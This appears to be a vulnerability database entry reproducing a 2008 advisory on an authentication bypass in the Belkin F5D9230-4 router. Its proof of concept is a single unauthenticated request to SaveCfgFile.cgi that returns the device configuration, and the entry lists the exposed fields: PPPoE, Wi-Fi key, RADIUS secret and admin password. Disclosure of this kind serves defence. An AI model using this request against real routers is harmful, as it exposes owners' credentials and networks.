Lucene search
Basic search
Lucene search
Search by product
Subscribe
K
Start 30-day trial
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
SIGN IN
Securityvulns
SECURITYVULNS:DOC:18923
History
Jan 22, 2008 - 12:00 a.m.
Belkin Wireless G Plus MIMO Router F5D9230-4 Authentication Bypass Vulnerability
2008-01-22
00:00:00
vulners.com
28
JSON
VULNERABILITY:
Belkin Wireless G Plus MIMO Router F5D9230-4
Authentication Bypass Vulnerability
AUTHOR:
DarkFig < gmdarkfig (at) gmail (dot) com >
http://acid-root.new.fr/?0:17
#
[email protected]
INTRODUCTION:
I recently bought this router for my local
network (without modem integrated), now I can tell
that it was a bad choice. When my ISP disconnects
me from internet, in the most case I have to reboot
my Modem and the Router in order to reconnect.
So I coded a program (which send http packets) to reboot
my router, it asks me the router password, and reboots it.
One day I wrote a bad password, but it worked. So I
decided to make some tests in order to see if there was
a vulnerability.
DESCRIPTION:
Apparently when we the router starts, it create a file
(without content) named user.conf, then when we go to
SaveCfgFile.cgi, the configuration is save to the file
user.conf. But the problem is that we can access
(and also change) to the file SaveCfgFile.cgi without
login.
PROOF OF CONCEPT:
For example we can get the configuration file here:
http://<ROUTER_IP>/SaveCfgFile.cgi
pppoe_username=…
pppoe_password=…
wl0_pskkey=…
wl0_key1=…
mradius_password=…
mradius_secret=…
httpd_password=…
http_passwd=…
pppoe_passwd=…
Tested on the latest firmware for this product
(version 3.01.53).
PATCH
Actually there is no firmware update, but I contacted the
author, if they'll release a patch, it will be available here:
http://web.belkin.com/support/download/download.asp
?download=F5D9230-4&lang=1&mode=
JSON